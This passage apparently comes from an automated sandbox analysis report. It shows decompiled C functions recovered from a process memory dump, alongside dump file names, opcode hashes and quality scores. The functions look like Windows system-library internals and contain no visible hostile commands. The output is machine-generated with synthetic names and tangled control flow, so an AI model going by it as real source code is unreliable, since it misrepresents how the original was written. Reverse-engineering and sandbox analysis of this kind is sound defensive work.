                                                              						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
                                                              						if(_t50 != 3) {
                                                              							if(_t50 == 2) {
                                                              								goto L8;
                                                              							}
                                                              							L9:
                                                              							if(E04BDF380(_t67 + 0xc, 0x4b75138, 0x10) == 0) {
                                                              								 *0x4c860d8 = _t67;
                                                              							}
                                                              							goto L10;
                                                              						}
                                                              						L8:
                                                              						_t64 = _t57 + 0x28;
                                                              						E04BC4F49(_t67, _t57 + 0x28);
                                                              						goto L9;
                                                              					}
                                                              					_t65 = 0;
                                                              					goto L7;
                                                              				}
                                                              				if(E04BC4E70(0x4c886b0, 0x4bc5690, 0, 0) != 0) {
                                                              					_t46 = E04B9CCC0(_t56);
                                                              					goto L12;
                                                              				} else {
                                                              					_t59 = 0xa0;
                                                              					goto L3;
                                                              				}
                                                              			}




















                                                              0x04bc4e51
                                                              0x04bc4e51
                                                              0x04bc4e03
                                                              0x04bc4e03
                                                              0x04bc4e09
                                                              0x04bc4e0f
                                                              0x04bc4e57
                                                              0x00000000
                                                              0x00000000
                                                              0x04bc4e1b
                                                              0x04bc4e30
                                                              0x04bc4e5b
                                                              0x04bc4e5b
                                                              0x00000000
                                                              0x04bc4e30
                                                              0x04bc4e11
                                                              0x04bc4e11
                                                              0x04bc4e16
                                                              0x00000000
                                                              0x04bc4e16
                                                              0x04bc4e01
                                                              0x00000000
                                                              0x04bc4e01
                                                              0x04bc4da5
                                                              0x04c06c6b
                                                              0x00000000
                                                              0x04bc4dab
                                                              0x04bc4dab
                                                              0x00000000
                                                              0x04bc4dab

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ee9659e0526ac5eaf956d9ec6c007b0435e7373555a64d22279610313d8c166b
                                                              • Instruction ID: 63e7e1d22ca2090de0ebde01e008ba195489e9f42c2a85f576576e636dbe8745
                                                              • Opcode Fuzzy Hash: ee9659e0526ac5eaf956d9ec6c007b0435e7373555a64d22279610313d8c166b
                                                              • Instruction Fuzzy Hash: 1241C071B40318AFEB25DF14CD90BAAB7AAEB44714F0144EDE8459B280E7B4FE408B91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E04BD3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                                              				intOrPtr _v8;
                                                              				char _v12;
                                                              				signed short** _t33;
                                                              				short* _t38;
                                                              				intOrPtr* _t39;
                                                              				intOrPtr* _t41;
                                                              				signed short _t43;
                                                              				intOrPtr* _t47;
                                                              				intOrPtr* _t53;
                                                              				signed short _t57;
                                                              				intOrPtr _t58;
                                                              				signed short _t60;
                                                              				signed short* _t61;
                                                              
                                                              				_t47 = __ecx;
                                                              				_t61 = __edx;
                                                              				_t60 = ( *__ecx & 0x0000ffff) + 2;
                                                              				if(_t60 > 0xfffe) {
                                                              					L22:
                                                              					return 0xc0000106;
                                                              				}
                                                              				if(__edx != 0) {
                                                              					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
                                                              						L5:
                                                              						E04BA7B60(0, _t61, 0x4b711c4);
                                                              						_v12 =  *_t47;
                                                              						_v12 = _v12 + 0xfff8;
                                                              						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
                                                              						E04BA7B60(0xfff8, _t61,  &_v12);
                                                              						_t33 = _a8;
                                                              						if(_t33 != 0) {
                                                              							 *_t33 = _t61;
                                                              						}
                                                              						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
                                                              						_t53 = _a12;
                                                              						if(_t53 != 0) {
                                                              							_t57 = _t61[2];
                                                              							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
                                                              							while(_t38 >= _t57) {
                                                              								if( *_t38 == 0x5c) {
                                                              									_t41 = _t38 + 2;
                                                              									if(_t41 == 0) {
                                                              										break;
                                                              									}
                                                              									_t58 = 0;
                                                              									if( *_t41 == 0) {
                                                              										L19:
                                                              										 *_t53 = _t58;
                                                              										goto L7;
                                                              									}
                                                              									 *_t53 = _t41;
                                                              									goto L7;
                                                              								}
                                                              								_t38 = _t38 - 2;
                                                              							}
                                                              							_t58 = 0;
                                                              							goto L19;
                                                              						} else {
                                                              							L7:
                                                              							_t39 = _a16;
                                                              							if(_t39 != 0) {
                                                              								 *_t39 = 0;
                                                              								 *((intOrPtr*)(_t39 + 4)) = 0;
                                                              								 *((intOrPtr*)(_t39 + 8)) = 0;
                                                              								 *((intOrPtr*)(_t39 + 0xc)) = 0;
                                                              							}
                                                              							return 0;
                                                              						}
                                                              					}
                                                              					_t61 = _a4;
                                                              					if(_t61 != 0) {
                                                              						L3:
                                                              						_t43 = L04BB4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
                                                              						_t61[2] = _t43;
                                                              						if(_t43 == 0) {
                                                              							return 0xc0000017;
                                                              						}
                                                              						_t61[1] = _t60;
                                                              						 *_t61 = 0;
                                                              						goto L5;
                                                              					}
                                                              					goto L22;
                                                              				}
                                                              				_t61 = _a4;
                                                              				if(_t61 == 0) {
                                                              					return 0xc000000d;
                                                              				}
                                                              				goto L3;
                                                              			}

















                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 018563fafee647ab7a64efe8b543b79aac3c3205f0e00a27f393335796a50551
                                                              • Instruction ID: 5a7ede72d4fe2bef7e233d5df192ac4aca06eb076824280ff2be1c152c3a2d63
                                                              • Opcode Fuzzy Hash: 018563fafee647ab7a64efe8b543b79aac3c3205f0e00a27f393335796a50551
                                                              • Instruction Fuzzy Hash: 9731B031705615DBC7248F2DC841A7ABBE5EF95700B0584EAE846CB391F730E840EBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 76%
                                                              			E04C17016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
                                                              				signed int _v8;
                                                              				char _v588;
                                                              				intOrPtr _v592;
                                                              				intOrPtr _v596;
                                                              				signed short* _v600;
                                                              				char _v604;
                                                              				short _v606;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed short* _t55;
                                                              				void* _t56;
                                                              				signed short* _t58;
                                                              				signed char* _t61;
                                                              				char* _t68;
                                                              				void* _t69;
                                                              				void* _t71;
                                                              				void* _t72;
                                                              				signed int _t75;
                                                              
                                                              				_t64 = __edx;
                                                              				_t77 = (_t75 & 0xfffffff8) - 0x25c;
                                                              				_v8 =  *0x4c8d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
                                                              				_t55 = _a16;
                                                              				_v606 = __ecx;
                                                              				_t71 = 0;
                                                              				_t58 = _a12;
                                                              				_v596 = __edx;
                                                              				_v600 = _t58;
                                                              				_t68 =  &_v588;
                                                              				if(_t58 != 0) {
                                                              					_t71 = ( *_t58 & 0x0000ffff) + 2;
                                                              					if(_t55 != 0) {
                                                              						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
                                                              					}
                                                              				}
                                                              				_t8 = _t71 + 0x2a; // 0x28
                                                              				_t33 = _t8;
                                                              				_v592 = _t8;
                                                              				if(_t71 <= 0x214) {
                                                              					L6:
                                                              					 *((short*)(_t68 + 6)) = _v606;
                                                              					if(_t64 != 0xffffffff) {
                                                              						asm("cdq");
                                                              						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
                                                              						 *((char*)(_t68 + 0x28)) = _a4;
                                                              						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
                                                              						 *((char*)(_t68 + 0x29)) = _a8;
                                                              						if(_t71 != 0) {
                                                              							_t22 = _t68 + 0x2a; // 0x2a
                                                              							_t64 = _t22;
                                                              							E04C16B4C(_t58, _t22, _t71,  &_v604);
                                                              							if(_t55 != 0) {
                                                              								_t25 = _v604 + 0x2a; // 0x2a
                                                              								_t64 = _t25 + _t68;
                                                              								E04C16B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
                                                              							}
                                                              							if(E04BB7D50() == 0) {
                                                              								_t61 = 0x7ffe0384;
                                                              							} else {
                                                              								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                              							}
                                                              							_push(_t68);
                                                              							_push(_v592 + 0xffffffe0);
                                                              							_push(0x402);
                                                              							_push( *_t61 & 0x000000ff);
                                                              							E04BD9AE0();
                                                              						}
                                                              					}
                                                              					_t35 =  &_v588;
                                                              					if( &_v588 != _t68) {
                                                              						_t35 = L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
                                                              					}
                                                              					L16:
                                                              					_pop(_t69);
                                                              					_pop(_t72);
                                                              					_pop(_t56);
                                                              					return E04BDB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
                                                              				}
                                                              				_t68 = L04BB4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
                                                              				if(_t68 == 0) {
                                                              					goto L16;
                                                              				} else {
                                                              					_t58 = _v600;
                                                              					_t64 = _v596;
                                                              					goto L6;
                                                              				}
                                                              			}























                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 75415f4780f90bfd36e64b1bb48e370d9efb4188fa1687af36c838151f8cd0ec
                                                              • Instruction ID: 5161c923eda1b74d616cfd23595f7d5567549c40c73090f84c18f55d8e23d58e
                                                              • Opcode Fuzzy Hash: 75415f4780f90bfd36e64b1bb48e370d9efb4188fa1687af36c838151f8cd0ec
                                                              • Instruction Fuzzy Hash: 4131C4766057519BC320DF68CC40A6AB3E6FFC9700F144A6DF899876A0E730F904D7A5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 68%
                                                              			E04BBC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
                                                              				signed int* _v8;
                                                              				char _v16;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				signed char _t33;
                                                              				signed char _t43;
                                                              				signed char _t48;
                                                              				signed char _t62;
                                                              				void* _t63;
                                                              				intOrPtr _t69;
                                                              				intOrPtr _t71;
                                                              				unsigned int* _t82;
                                                              				void* _t83;
                                                              
                                                              				_t80 = __ecx;
                                                              				_t82 = __edx;
                                                              				_t33 =  *((intOrPtr*)(__ecx + 0xde));
                                                              				_t62 = _t33 >> 0x00000001 & 0x00000001;
                                                              				if((_t33 & 0x00000001) != 0) {
                                                              					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
                                                              					if(E04BB7D50() != 0) {
                                                              						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                              					} else {
                                                              						_t43 = 0x7ffe0386;
                                                              					}
                                                              					if( *_t43 != 0) {
                                                              						_t43 = E04C68D34(_v8, _t80);
                                                              					}
                                                              					E04BB2280(_t43, _t82);
                                                              					if( *((char*)(_t80 + 0xdc)) == 0) {
                                                              						E04BAFFB0(_t62, _t80, _t82);
                                                              						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
                                                              						_t30 = _t80 + 0xd0; // 0xd0
                                                              						_t83 = _t30;
                                                              						E04C68833(_t83,  &_v16);
                                                              						_t81 = _t80 + 0x90;
                                                              						E04BAFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
                                                              						_t63 = 0;
                                                              						_push(0);
                                                              						_push(_t83);
                                                              						_t48 = E04BDB180();
                                                              						if(_a4 != 0) {
                                                              							E04BB2280(_t48, _t81);
                                                              						}
                                                              					} else {
                                                              						_t69 = _v8;
                                                              						_t12 = _t80 + 0x98; // 0x98
                                                              						_t13 = _t69 + 0xc; // 0x575651ff
                                                              						E04BBBB2D(_t13, _t12);
                                                              						_t71 = _v8;
                                                              						_t15 = _t80 + 0xb0; // 0xb0
                                                              						_t16 = _t71 + 8; // 0x8b000cc2
                                                              						E04BBBB2D(_t16, _t15);
                                                              						E04BBB944(_v8, _t62);
                                                              						 *((char*)(_t80 + 0xdc)) = 0;
                                                              						E04BAFFB0(0, _t80, _t82);
                                                              						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
                                                              						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
                                                              						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
                                                              						 *(_t80 + 0xde) = 0;
                                                              						if(_a4 == 0) {
                                                              							_t25 = _t80 + 0x90; // 0x90
                                                              							E04BAFFB0(0, _t80, _t25);
                                                              						}
                                                              						_t63 = 1;
                                                              					}
                                                              					return _t63;
                                                              				}
                                                              				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
                                                              				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
                                                              				if(_a4 == 0) {
                                                              					_t24 = _t80 + 0x90; // 0x90
                                                              					E04BAFFB0(0, __ecx, _t24);
                                                              				}
                                                              				return 0;
                                                              			}

















                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                              • Instruction ID: bba83cd9c4b18c2c1040851bdba47e6a14c11467930ca17d38edc9307227ca3f
                                                              • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                              • Instruction Fuzzy Hash: DD311471705646AEEB08EBB4C480BF9FB64BF42248F0481DEC55897341DBB57A19DBE0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 93%
                                                              			E04BD8EC7(void* __ecx, void* __edx) {
                                                              				signed int _v8;
                                                              				signed int* _v16;
                                                              				intOrPtr _v20;
                                                              				signed int* _v24;
                                                              				char* _v28;
                                                              				signed int* _v32;
                                                              				intOrPtr _v36;
                                                              				signed int* _v40;
                                                              				signed int* _v44;
                                                              				signed int* _v48;
                                                              				intOrPtr _v52;
                                                              				signed int* _v56;
                                                              				signed int* _v60;
                                                              				signed int* _v64;
                                                              				intOrPtr _v68;
                                                              				signed int* _v72;
                                                              				char* _v76;
                                                              				signed int* _v80;
                                                              				signed int _v84;
                                                              				signed int* _v88;
                                                              				intOrPtr _v92;
                                                              				signed int* _v96;
                                                              				intOrPtr _v100;
                                                              				signed int* _v104;
                                                              				signed int* _v108;
                                                              				char _v140;
                                                              				signed int _v144;
                                                              				signed int _v148;
                                                              				signed int* _v152;
                                                              				char _v156;
                                                              				signed int* _v160;
                                                              				char _v164;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				void* _t67;
                                                              				intOrPtr _t70;
                                                              				void* _t71;
                                                              				void* _t72;
                                                              				signed int _t73;
                                                              
                                                              				_t69 = __edx;
                                                              				_v8 =  *0x4c8d360 ^ _t73;
                                                              				_t48 =  *[fs:0x30];
                                                              				_t72 = __edx;
                                                              				_t71 = __ecx;
                                                              				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
                                                              					_t48 = E04BC4E70(0x4c886e4, 0x4bd9490, 0, 0);
                                                              					if( *0x4c853e8 > 5 && E04BD8F33(0x4c853e8, 0, 0x2000) != 0) {
                                                              						_v156 =  *((intOrPtr*)(_t71 + 0x44));
                                                              						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
                                                              						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
                                                              						_v164 =  *((intOrPtr*)(_t72 + 0x58));
                                                              						_v108 =  &_v84;
                                                              						_v92 =  *((intOrPtr*)(_t71 + 0x28));
                                                              						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
                                                              						_v76 =  &_v156;
                                                              						_t70 = 8;
                                                              						_v60 =  &_v144;
                                                              						_t67 = 4;
                                                              						_v44 =  &_v148;
                                                              						_v152 = 0;
                                                              						_v160 = 0;
                                                              						_v104 = 0;
                                                              						_v100 = 2;
                                                              						_v96 = 0;
                                                              						_v88 = 0;
                                                              						_v80 = 0;
                                                              						_v72 = 0;
                                                              						_v68 = _t70;
                                                              						_v64 = 0;
                                                              						_v56 = 0;
                                                              						_v52 = 0x4c853e8;
                                                              						_v48 = 0;
                                                              						_v40 = 0;
                                                              						_v36 = 0x4c853e8;
                                                              						_v32 = 0;
                                                              						_v28 =  &_v164;
                                                              						_v24 = 0;
                                                              						_v20 = _t70;
                                                              						_v16 = 0;
                                                              						_t69 = 0x4b7bc46;
                                                              						_t48 = E04C17B9C(0x4c853e8, 0x4b7bc46, _t67, 0x4c853e8, _t70,  &_v140);
                                                              					}
                                                              				}
                                                              				return E04BDB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
                                                              			}












































                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2727ec0937c1bd031833e2a6b0fb70c879bc07b08fddc29a24e0ccb5dee1b6df
                                                              • Instruction ID: 6e6b3a352b14a7ff053afd36b82cb450bc0ecdf1b736138646a1498f8adb5c48
                                                              • Opcode Fuzzy Hash: 2727ec0937c1bd031833e2a6b0fb70c879bc07b08fddc29a24e0ccb5dee1b6df
                                                              • Instruction Fuzzy Hash: 0A41B2B1D003189FDB24DFAAD980AADFBF5FB48314F9041AEE519A7600E7746A44CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 74%
                                                              			E04BCE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
                                                              				intOrPtr* _v0;
                                                              				signed char _v4;
                                                              				signed int _v8;
                                                              				void* __ecx;
                                                              				void* __ebp;
                                                              				void* _t37;
                                                              				intOrPtr _t38;
                                                              				signed int _t44;
                                                              				signed char _t52;
                                                              				void* _t54;
                                                              				intOrPtr* _t56;
                                                              				void* _t58;
                                                              				char* _t59;
                                                              				signed int _t62;
                                                              
                                                              				_t58 = __edx;
                                                              				_push(0);
                                                              				_push(4);
                                                              				_push( &_v8);
                                                              				_push(0x24);
                                                              				_push(0xffffffff);
                                                              				if(E04BD9670() < 0) {
                                                              					L04BEDF30(_t54, _t58, _t35);
                                                              					asm("int3");
                                                              					asm("int3");
                                                              					asm("int3");
                                                              					asm("int3");
                                                              					asm("int3");
                                                              					asm("int3");
                                                              					_push(_t54);
                                                              					_t52 = _v4;
                                                              					if(_t52 > 8) {
                                                              						_t37 = 0xc0000078;
                                                              					} else {
                                                              						_t38 =  *0x4c87b9c; // 0x0
                                                              						_t62 = _t52 & 0x000000ff;
                                                              						_t59 = L04BB4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
                                                              						if(_t59 == 0) {
                                                              							_t37 = 0xc0000017;
                                                              						} else {
                                                              							_t56 = _v0;
                                                              							 *(_t59 + 1) = _t52;
                                                              							 *_t59 = 1;
                                                              							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
                                                              							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
                                                              							_t44 = _t62 - 1;
                                                              							if(_t44 <= 7) {
                                                              								switch( *((intOrPtr*)(_t44 * 4 +  &M04BCE810))) {
                                                              									case 0:
                                                              										L6:
                                                              										 *((intOrPtr*)(_t59 + 8)) = _a8;
                                                              										goto L7;
                                                              									case 1:
                                                              										L13:
                                                              										 *((intOrPtr*)(__edx + 0xc)) = _a12;
                                                              										goto L6;
                                                              									case 2:
                                                              										L12:
                                                              										 *((intOrPtr*)(__edx + 0x10)) = _a16;
                                                              										goto L13;
                                                              									case 3:
                                                              										L11:
                                                              										 *((intOrPtr*)(__edx + 0x14)) = _a20;
                                                              										goto L12;
                                                              									case 4:
                                                              										L10:
                                                              										 *((intOrPtr*)(__edx + 0x18)) = _a24;
                                                              										goto L11;
                                                              									case 5:
                                                              										L9:
                                                              										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
                                                              										goto L10;
                                                              									case 6:
                                                              										L17:
                                                              										 *((intOrPtr*)(__edx + 0x20)) = _a32;
                                                              										goto L9;
                                                              									case 7:
                                                              										 *((intOrPtr*)(__edx + 0x24)) = _a36;
                                                              										goto L17;
                                                              								}
                                                              							}
                                                              							L7:
                                                              							 *_a40 = _t59;
                                                              							_t37 = 0;
                                                              						}
                                                              					}
                                                              					return _t37;
                                                              				} else {
                                                              					_push(0x20);
                                                              					asm("ror eax, cl");
                                                              					return _a4 ^ _v8;
                                                              				}
                                                              			}


















                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 67%
                                                              			E04BCBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
                                                              				intOrPtr _v8;
                                                              				intOrPtr _v12;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				intOrPtr _t22;
                                                              				intOrPtr* _t41;
                                                              				intOrPtr _t51;
                                                              
                                                              				_t51 =  *0x4c86100; // 0x33
                                                              				_v12 = __edx;
                                                              				_v8 = __ecx;
                                                              				if(_t51 >= 0x800) {
                                                              					L12:
                                                              					return 0;
                                                              				} else {
                                                              					goto L1;
                                                              				}
                                                              				while(1) {
                                                              					L1:
                                                              					_t22 = _t51;
                                                              					asm("lock cmpxchg [ecx], edx");
                                                              					if(_t51 == _t22) {
                                                              						break;
                                                              					}
                                                              					_t51 = _t22;
                                                              					if(_t22 < 0x800) {
                                                              						continue;
                                                              					}
                                                              					goto L12;
                                                              				}
                                                              				E04BB2280(0xd, 0x17e9f1a0);
                                                              				_t41 =  *0x4c860f8; // 0x0
                                                              				if(_t41 != 0) {
                                                              					 *0x4c860f8 =  *_t41;
                                                              					 *0x4c860fc =  *0x4c860fc + 0xffff;
                                                              				}
                                                              				E04BAFFB0(_t41, 0x800, 0x17e9f1a0);
                                                              				if(_t41 != 0) {
                                                              					L6:
                                                              					asm("movsd");
                                                              					asm("movsd");
                                                              					asm("movsd");
                                                              					asm("movsd");
                                                              					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
                                                              					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
                                                              					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
                                                              					do {
                                                              						asm("lock xadd [0x4c860f0], ax");
                                                              						 *((short*)(_t41 + 0x34)) = 1;
                                                              					} while (1 == 0);
                                                              					goto L8;
                                                              				} else {
                                                              					_t41 = L04BB4620(0x4c86100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
                                                              					if(_t41 == 0) {
                                                              						L11:
                                                              						asm("lock dec dword [0x4c86100]");
                                                              						L8:
                                                              						return _t41;
                                                              					}
                                                              					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
                                                              					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
                                                              					if(_t41 == 0) {
                                                              						goto L11;
                                                              					}
                                                              					goto L6;
                                                              				}
                                                              			}











                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 76%
                                                              			E04B99100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
                                                              				signed int _t53;
                                                              				signed int _t56;
                                                              				signed int* _t60;
                                                              				signed int _t63;
                                                              				signed int _t66;
                                                              				signed int _t69;
                                                              				void* _t70;
                                                              				intOrPtr* _t72;
                                                              				void* _t78;
                                                              				void* _t79;
                                                              				signed int _t80;
                                                              				intOrPtr _t82;
                                                              				void* _t85;
                                                              				void* _t88;
                                                              				void* _t89;
                                                              
                                                              				_t84 = __esi;
                                                              				_t70 = __ecx;
                                                              				_t68 = __ebx;
                                                              				_push(0x2c);
                                                              				_push(0x4c6f6e8);
                                                              				E04BED0E8(__ebx, __edi, __esi);
                                                              				 *((char*)(_t85 - 0x1d)) = 0;
                                                              				_t82 =  *((intOrPtr*)(_t85 + 8));
                                                              				if(_t82 == 0) {
                                                              					L4:
                                                              					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
                                                              						E04C688F5(_t68, _t70, _t78, _t82, _t84, __eflags);
                                                              					}
                                                              					L5:
                                                              					return E04BED130(_t68, _t82, _t84);
                                                              				}
                                                              				_t88 = _t82 -  *0x4c886c0; // 0x2e607b0
                                                              				if(_t88 == 0) {
                                                              					goto L4;
                                                              				}
                                                              				_t89 = _t82 -  *0x4c886b8; // 0x0
                                                              				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                              					goto L4;
                                                              				} else {
                                                              					E04BB2280(_t82 + 0xe0, _t82 + 0xe0);
                                                              					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
                                                              					__eflags =  *((char*)(_t82 + 0xe5));
                                                              					if(__eflags != 0) {
                                                              						E04C688F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
                                                              						goto L12;
                                                              					} else {
                                                              						__eflags =  *((char*)(_t82 + 0xe4));
                                                              						if( *((char*)(_t82 + 0xe4)) == 0) {
                                                              							 *((char*)(_t82 + 0xe4)) = 1;
                                                              							_push(_t82);
                                                              							_push( *((intOrPtr*)(_t82 + 0x24)));
                                                              							E04BDAFD0();
                                                              						}
                                                              						while(1) {
                                                              							_t60 = _t82 + 8;
                                                              							 *(_t85 - 0x2c) = _t60;
                                                              							_t68 =  *_t60;
                                                              							_t80 = _t60[1];
                                                              							 *(_t85 - 0x28) = _t68;
                                                              							 *(_t85 - 0x24) = _t80;
                                                              							while(1) {
                                                              								L10:
                                                              								__eflags = _t80;
                                                              								if(_t80 == 0) {
                                                              									break;
                                                              								}
                                                              								_t84 = _t68;
                                                              								 *(_t85 - 0x30) = _t80;
                                                              								 *(_t85 - 0x24) = _t80 - 1;
                                                              								asm("lock cmpxchg8b [edi]");
                                                              								_t68 = _t84;
                                                              								 *(_t85 - 0x28) = _t68;
                                                              								 *(_t85 - 0x24) = _t80;
                                                              								__eflags = _t68 - _t84;
                                                              								_t82 =  *((intOrPtr*)(_t85 + 8));
                                                              								if(_t68 != _t84) {
                                                              									continue;
                                                              								}
                                                              								__eflags = _t80 -  *(_t85 - 0x30);
                                                              								if(_t80 !=  *(_t85 - 0x30)) {
                                                              									continue;
                                                              								}
                                                              								__eflags = _t80;
                                                              								if(_t80 == 0) {
                                                              									break;
                                                              								}
                                                              								_t63 = 0;
                                                              								 *(_t85 - 0x34) = 0;
                                                              								_t84 = 0;
                                                              								__eflags = 0;
                                                              								while(1) {
                                                              									 *(_t85 - 0x3c) = _t84;
                                                              									__eflags = _t84 - 3;
                                                              									if(_t84 >= 3) {
                                                              										break;
                                                              									}
                                                              									__eflags = _t63;
                                                              									if(_t63 != 0) {
                                                              										L40:
                                                              										_t84 =  *_t63;
                                                              										__eflags = _t84;
                                                              										if(_t84 != 0) {
                                                              											_t84 =  *(_t84 + 4);
                                                              											__eflags = _t84;
                                                              											if(_t84 != 0) {
                                                              												 *0x4c8b1e0(_t63, _t82);
                                                              												 *_t84();
                                                              											}
                                                              										}
                                                              										do {
                                                              											_t60 = _t82 + 8;
                                                              											 *(_t85 - 0x2c) = _t60;
                                                              											_t68 =  *_t60;
                                                              											_t80 = _t60[1];
                                                              											 *(_t85 - 0x28) = _t68;
                                                              											 *(_t85 - 0x24) = _t80;
                                                              											goto L10;
                                                              										} while (_t63 == 0);
                                                              										goto L40;
                                                              									}
